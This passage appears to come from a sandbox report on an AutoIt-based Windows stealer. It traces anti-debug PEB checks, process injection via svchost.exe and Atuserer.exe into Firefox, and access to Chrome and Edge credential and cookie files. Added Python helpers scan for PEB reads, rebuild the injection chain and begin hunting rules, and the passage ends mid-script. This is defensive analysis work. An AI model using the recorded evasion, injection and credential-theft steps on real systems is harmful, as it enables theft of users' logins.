                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68402 mov eax, dword ptr fs:[00000030h]4_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F325E0 mov eax, dword ptr fs:[00000030h]4_2_02F325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C5ED mov eax, dword ptr fs:[00000030h]4_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C5ED mov eax, dword ptr fs:[00000030h]4_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F365D0 mov eax, dword ptr fs:[00000030h]4_2_02F365D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code functions that read the PEB pointer from fs:[00000030h]; one row per function and register, "xN" is the number of such reads the disassembler found in that function:
                4_2_02F6A5D0  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F6E5CF  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F545B1  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FB05A7  mov eax, dword ptr fs:[00000030h]  x3
                4_2_02F6E59C  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F32582  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F32582  mov ecx, dword ptr fs:[00000030h]  x1
                4_2_02F64588  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F6656A  mov eax, dword ptr fs:[00000030h]  x3
                4_2_02F38550  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F40535  mov eax, dword ptr fs:[00000030h]  x6
                4_2_02F5E53E  mov eax, dword ptr fs:[00000030h]  x5
                4_2_02FC6500  mov eax, dword ptr fs:[00000030h]  x1
                4_2_03004B00  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F6AAEE  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F30AD0  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F64AD0  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F86ACC  mov eax, dword ptr fs:[00000030h]  x3
                4_2_02F38AA0  mov eax, dword ptr fs:[00000030h]  x2
                4_2_03002B57  mov eax, dword ptr fs:[00000030h]  x4
                4_2_02F86AA4  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F68A90  mov edx, dword ptr fs:[00000030h]  x1
                4_2_02F3EA80  mov eax, dword ptr fs:[00000030h]  x9
                4_2_02FACA72  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F6CA6F  mov eax, dword ptr fs:[00000030h]  x3
                4_2_02FDEA60  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F36A50  mov eax, dword ptr fs:[00000030h]  x7
                4_2_02F40A5B  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F54A35  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F6CA38  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F6CA24  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F5EA2E  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FBCA11  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F38BF0  mov eax, dword ptr fs:[00000030h]  x3
                4_2_02F5EBFC  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FBCBF0  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FDEBD0  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F50BCB  mov eax, dword ptr fs:[00000030h]  x3
                4_2_02F30BCD  mov eax, dword ptr fs:[00000030h]  x3
                4_2_02F40BBE  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FE4BB0  mov eax, dword ptr fs:[00000030h]  x2
                4_2_03004A80  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F2CB7E  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F28B50  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FDEB50  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FE4B4B  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FC6B40  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FD8B42  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FFAB40  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F5EB20  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FF8B28  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FAEB1D  mov eax, dword ptr fs:[00000030h]  x9
                4_2_02F6C8F9  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FFA8E4  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F5E8C0  mov eax, dword ptr fs:[00000030h]  x1
                4_2_03004940  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FBC89D  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F30887  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FBE872  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FC6870  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F60854  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F34859  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F42840  mov ecx, dword ptr fs:[00000030h]  x1
                4_2_02F52835  mov eax, dword ptr fs:[00000030h]  x5
                4_2_02F52835  mov ecx, dword ptr fs:[00000030h]  x1
                4_2_02F6A830  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FD483A  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FBC810  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F629F9  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FBE9E0  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F3A9D0  mov eax, dword ptr fs:[00000030h]  x6
                4_2_02F649D0  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FFA9D3  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FC69C0  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02FB89B3  mov esi, dword ptr fs:[00000030h]  x1
                4_2_02FB89B3  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02F429A0  mov eax, dword ptr fs:[00000030h]  x13
                4_2_02F309AD  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FD4978  mov eax, dword ptr fs:[00000030h]  x2
                4_2_02FBC97C  mov eax, dword ptr fs:[00000030h]  x1
                4_2_02F56962  mov eax, dword ptr fs:[00000030h]  x2
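The rows above are the disassembler's evidence for PEB access: in a 32-bit (WoW64) process fs:[30h] holds the PEB pointer, and code that loads it normally goes on to read BeingDebugged (PEB+0x02), NtGlobalFlag (PEB+0x68) or the loader data at Ldr (PEB+0x0C). The following scanner, an added example that is not Joe Sandbox code, finds the x86 encodings of that load in a raw code buffer (both the `mov eax, fs:[30h]` short form, the ModRM form for any register, and the two-step `fs:[18h]` then `[eax+30h]` variant) and names the PEB field the next instruction touches. The sample buffer is constructed for the example; the instruction encodings are standard x86.

```python
"""Static scan for the x86 PEB reads the sandbox rows above record.

Added example, not Joe Sandbox code. It locates every load of the PEB
pointer in a 32-bit code buffer and classifies the instruction that
follows it against the well-known anti-debug fields.
"""

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

PEB_MOFFS = b"\x64\xa1\x30\x00\x00\x00"                 # mov eax, fs:[30h]
TEB_THEN_PEB = b"\x64\xa1\x18\x00\x00\x00\x8b\x40\x30"   # mov eax, fs:[18h]; mov eax, [eax+30h]


def peb_loads(code):
    """Yield (offset, register, length) for each PEB-pointer load in code."""
    i, n = 0, len(code)
    while i < n:
        if code.startswith(PEB_MOFFS, i):
            yield i, "eax", len(PEB_MOFFS)
            i += len(PEB_MOFFS)
        elif code.startswith(TEB_THEN_PEB, i):
            yield i, "eax", len(TEB_THEN_PEB)
            i += len(TEB_THEN_PEB)
        # mov r32, dword ptr fs:[30h], ModRM form: 64 8B <mod=00 reg rm=101> 30 00 00 00
        elif (code.startswith(b"\x64\x8b", i) and i + 7 <= n
              and (code[i + 2] & 0xC7) == 0x05
              and code[i + 3:i + 7] == b"\x30\x00\x00\x00"):
            yield i, REGS[(code[i + 2] >> 3) & 7], 7
            i += 7
        else:
            i += 1


def peb_field(code, off, reg):
    """Name the PEB field read by the instruction at off through reg, or None."""
    r = REGS.index(reg)
    if r == 4:                      # [esp+disp8] needs a SIB byte; not decoded here
        return None
    nxt = code[off:off + 4]
    if len(nxt) == 4:
        if nxt[0:2] == b"\x0f\xb6" and nxt[2] == (0x40 | r) and nxt[3] == 0x02:
            return "BeingDebugged"  # movzx eax, byte ptr [reg+2]
        if nxt[0] == 0x80 and nxt[1] == (0x78 | r) and nxt[2:4] == b"\x02\x00":
            return "BeingDebugged"  # cmp byte ptr [reg+2], 0
        if nxt[0] == 0xF6 and nxt[1] == (0x40 | r) and nxt[2:4] == b"\x68\x70":
            return "NtGlobalFlag"   # test byte ptr [reg+68h], 70h
    if len(nxt) >= 3 and nxt[0] == 0x8B and nxt[1] == (0x40 | r) and nxt[2] == 0x0C:
        return "Ldr"                # mov eax, dword ptr [reg+0Ch]
    return None


def scan(code):
    """Return [(offset, register, field)] for every PEB load found in code."""
    return [(off, reg, peb_field(code, off + ln, reg))
            for off, reg, ln in peb_loads(code)]


# Constructed sample: a small hand-assembled x86 function, not bytes from the sample.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"                     # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"            # mov eax, fs:[30h]
    "0F B6 40 02"                  # movzx eax, byte ptr [eax+2]   -> BeingDebugged
    "85 C0"                        # test eax, eax
    "64 8B 0D 30 00 00 00"         # mov ecx, fs:[30h]
    "F6 41 68 70"                  # test byte ptr [ecx+68h], 70h  -> NtGlobalFlag
    "64 A1 18 00 00 00 8B 40 30"   # mov eax, fs:[18h]; mov eax, [eax+30h]
    "8B 40 0C"                     # mov eax, [eax+0Ch]            -> Ldr
    "5D C3"                        # pop ebp; ret
)

if __name__ == "__main__":
    for off, reg, field in scan(SAMPLE_CODE):
        print(f"+0x{off:04x}: PEB -> {reg}, next reads {field or 'unknown field'}")
```

The scanner is deliberately narrow: it decodes only the field access that immediately follows the load, so a compiler that spills the PEB pointer to the stack first, or code that reads the field through a different register, shows up as a PEB load with an unknown field and still deserves a look.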
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003981D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_0036A2A4 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_0036A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Native API calls the sandbox recorded as direct; "Direct from" is the address it attributes each call to:
                NtOpenKeyEx: Direct from: 0x77672B9C
                NtProtectVirtualMemory: Direct from: 0x77672F9C
                NtCreateFile: Direct from: 0x77672FEC
                NtOpenFile: Direct from: 0x77672DCC
                NtTerminateThread: Direct from: 0x77672FCC
                NtQueryInformationToken: Direct from: 0x77672CAC
                NtAllocateVirtualMemory: Direct from: 0x77672BEC
                NtDeviceIoControlFile: Direct from: 0x77672AEC
                NtQuerySystemInformation: Direct from: 0x776748CC
                NtQueryAttributesFile: Direct from: 0x77672E6C
                NtSetInformationThread: Direct from: 0x77672B4C
                NtOpenSection: Direct from: 0x77672E0C
                NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                NtAllocateVirtualMemory: Direct from: 0x776748EC
                NtSetInformationThread: Direct from: 0x776663F9
                NtReadVirtualMemory: Direct from: 0x77672E8C
                NtCreateKey: Direct from: 0x77672C6C
                NtClose: Direct from: 0x77672B6C
                NtWriteVirtualMemory: Direct from: 0x7767490C
                NtAllocateVirtualMemory: Direct from: 0x77673C9C
                NtDelayExecution: Direct from: 0x77672DDC
                NtCreateUserProcess: Direct from: 0x7767371C
                NtQuerySystemInformation: Direct from: 0x77672DFC
                NtQueryInformationProcess: Direct from: 0x77672C26
                NtResumeThread: Direct from: 0x77672FBC
                NtReadFile: Direct from: 0x77672ADC
                NtAllocateVirtualMemory: Direct from: 0x77672BFC
                NtUnmapViewOfSection: Direct from: 0x77672D3C
                NtResumeThread: Direct from: 0x776736AC
                NtSetInformationProcess: Direct from: 0x77672C5C
                NtMapViewOfSection: Direct from: 0x77672D1C
                NtNotifyChangeKey: Direct from: 0x77673C2C
                NtWriteVirtualMemory: Direct from: 0x77672E3C
                NtCreateMutant: Direct from: 0x776735CC
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\Atuserer.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: NULL target: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe protection: read write
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: NULL target: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\Atuserer.exe | Thread register set: target process: 7428
                Source: C:\Windows\SysWOW64\Atuserer.exe | Thread APC queued: target process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 334008
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00398A73 LogonUserW
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00343B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00344A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003A4CFA mouse_event
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Process created: C:\Windows\SysWOW64\Atuserer.exe "C:\Windows\SysWOW64\Atuserer.exe"
                Source: C:\Windows\SysWOW64\Atuserer.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
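The "Section loaded", "Thread register set", "Thread APC queued", "Memory written" and "Process created" rows above describe one injection chain, but the export lists them flat and in signature order. The helper below, an added triage example that is not Joe Sandbox code, parses those rows in the raw text-export form (source path glued to the event text, trailing "Jump to behavior") and rebuilds the actor-to-target graph, so the hand-off from the sample through svchost.exe, avRLXQyosx.exe and Atuserer.exe into firefox.exe can be read directly. The sample rows are constructed from this report's block; the row format is the report's, the selection is ours.

```python
"""Rebuild the injection and process chain from Joe Sandbox 'Source:' rows.

Added triage helper, not Joe Sandbox code. It accepts the rows as they
appear in the raw text export and turns them into actor -> target edges
labelled with the technique the sandbox observed.
"""
import ntpath
import re

KINDS = ("Section loaded", "Thread register set", "Thread APC queued",
         "Memory written", "Process created")
# The source path ends in .exe and runs straight into the event text; the
# interactive "Jump to behavior" suffix may or may not be present.
ROW_RE = re.compile(r"^Source: (?P<actor>.+?\.exe)(?P<kind>" + "|".join(KINDS)
                    + r"): (?P<detail>.*?)(?:Jump to behavior)?$")
DETAIL_RE = {
    "Section loaded": re.compile(r"^NULL target: (?P<target>.+?\.exe) protection: (?P<prot>.+)$"),
    "Thread register set": re.compile(r"^target process: (?P<target>\S+)$"),
    "Thread APC queued": re.compile(r"^target process: (?P<target>.+?\.exe)$"),
    "Memory written": re.compile(r"^(?P<target>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+)$"),
    "Process created": re.compile(r'^(?P<target>.+?\.exe) "(?P<cmdline>.*)"$'),
}


def parse_row(row):
    """Return a dict with actor, kind, target and kind-specific fields, or None."""
    m = ROW_RE.match(row)
    if not m:
        return None
    d = DETAIL_RE[m["kind"]].match(m["detail"])
    if not d:
        return None
    return {"actor": m["actor"], "kind": m["kind"], **d.groupdict()}


def parse_rows(rows):
    return [e for e in map(parse_row, rows) if e]


def build_graph(events):
    """actor -> target -> set of event kinds, in first-seen order."""
    graph = {}
    for e in events:
        graph.setdefault(e["actor"], {}).setdefault(e["target"], set()).add(e["kind"])
    return graph


def chain(events, root):
    """Depth-first list of (actor, target, kinds) edges reachable from root."""
    graph, seen, edges = build_graph(events), set(), []

    def visit(node):
        seen.add(node)
        for target, kinds in graph.get(node, {}).items():
            edges.append((ntpath.basename(node), ntpath.basename(target), sorted(kinds)))
            if target not in seen:       # the graph can be cyclic (mutual injection)
                visit(target)

    visit(root)
    return edges


def injected_targets(events):
    """Processes that received executable mappings or foreign memory writes."""
    hit = {ntpath.basename(e["target"]) for e in events
           if e["kind"] == "Memory written"
           or (e["kind"] == "Section loaded" and "execute" in e.get("prot", ""))}
    return sorted(hit)


# Constructed from the rows of this report block (constants only shorten the lines).
APPDIR = r"C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv"
SAMPLE = r"C:\Users\user\Desktop\RO2Y11yOJ7.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
LOADER = APPDIR + r"\avRLXQyosx.exe"
ATUSERER = r"C:\Windows\SysWOW64\Atuserer.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
J = "Jump to behavior"
SAMPLE_ROWS = [
    f"Source: {SAMPLE}Section loaded: NULL target: {SVCHOST} protection: execute and read and write{J}",
    f"Source: {SVCHOST}Section loaded: NULL target: {LOADER} protection: execute and read and write{J}",
    f"Source: {SVCHOST}Section loaded: NULL target: {ATUSERER} protection: execute and read and write{J}",
    f"Source: {ATUSERER}Section loaded: NULL target: {LOADER} protection: read write{J}",
    f"Source: {ATUSERER}Section loaded: NULL target: {LOADER} protection: execute and read and write{J}",
    f"Source: {ATUSERER}Section loaded: NULL target: {FIREFOX} protection: read write{J}",
    f"Source: {ATUSERER}Section loaded: NULL target: {FIREFOX} protection: execute and read and write{J}",
    f"Source: {ATUSERER}Thread register set: target process: 7428{J}",
    f"Source: {ATUSERER}Thread APC queued: target process: {LOADER}{J}",
    f"Source: {SAMPLE}Memory written: {SVCHOST} base: 334008{J}",
    f'Source: {SAMPLE}Process created: {SVCHOST} "{SAMPLE}"{J}',
    f'Source: {LOADER}Process created: {ATUSERER} "{ATUSERER}"{J}',
    f'Source: {ATUSERER}Process created: {FIREFOX} "C:\\Program Files\\Mozilla Firefox\\Firefox.exe"{J}',
]

if __name__ == "__main__":
    for actor, target, kinds in chain(parse_rows(SAMPLE_ROWS), SAMPLE):
        print(f"{actor} -> {target}: {', '.join(kinds)}")
```

Edges to a node already visited are still emitted, so the Atuserer.exe to avRLXQyosx.exe hand-back (the APC queue) appears even though avRLXQyosx.exe was reached earlier through svchost.exe; the "Thread register set" row only names a PID, so that edge ends in "7428" and has to be matched to a process by hand from the report's process tree.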
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003981D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003A4A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: RO2Y11yOJ7.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: RO2Y11yOJ7.exe, avRLXQyosx.exe, 00000006.00000000.1588919670.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3161013385.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744270504.00000000016C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: avRLXQyosx.exe, 00000006.00000000.1588919670.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3161013385.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744270504.00000000016C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: avRLXQyosx.exe, 00000006.00000000.1588919670.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3161013385.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744270504.00000000016C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Manager
                Source: avRLXQyosx.exe, 00000006.00000000.1588919670.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3161013385.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744270504.00000000016C1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003687AB cpuid 2_2_003687AB
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00375007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00375007
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0038215F GetUserNameW,2_2_0038215F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003740BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_003740BA
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00344AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00344AFE

                Stealing of Sensitive Information

Source: Yara match | File source: 4.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\Atuserer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\Atuserer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\Atuserer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\Atuserer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\Atuserer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\Atuserer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\Atuserer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\Atuserer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\Atuserer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: RO2Y11yOJ7.exe | Binary or memory string: WIN_81
Source: RO2Y11yOJ7.exe | Binary or memory string: WIN_XP
Source: RO2Y11yOJ7.exe | Binary or memory string: WIN_XPe
Source: RO2Y11yOJ7.exe | Binary or memory string: WIN_VISTA
Source: RO2Y11yOJ7.exe | Binary or memory string: WIN_7
Source: RO2Y11yOJ7.exe | Binary or memory string: WIN_8
Source: RO2Y11yOJ7.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
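Two of the rows in this report are worth turning into host-side hunting rules: svchost.exe being started by the sample with the sample's own path as its command line (the "Process created" rows further up), and the SysWOW64 process Atuserer.exe opening the Chrome and Edge credential stores and the Outlook profile key (the "File opened" and "Key opened" rows just above). The script below is an added example and is not part of the Joe Sandbox report. The events are constructed from the report's own paths; the field names (EventType, Image, CommandLine, ParentImage, ObjectName) are an assumption modelled on Sysmon process-creation events and Windows object-access auditing, and the rule names are mine.

```python
"""Added hunting rules for behaviour recorded in this report; not Joe Sandbox code.
Events are constructed from the report's paths. Field names are an assumption
modelled on Sysmon process creation and Windows object-access auditing."""
import ntpath
import shlex
from dataclasses import dataclass

# Image names that legitimately open their own Chromium credential stores.
BROWSER_OWNERS = {"chrome.exe", "msedge.exe"}
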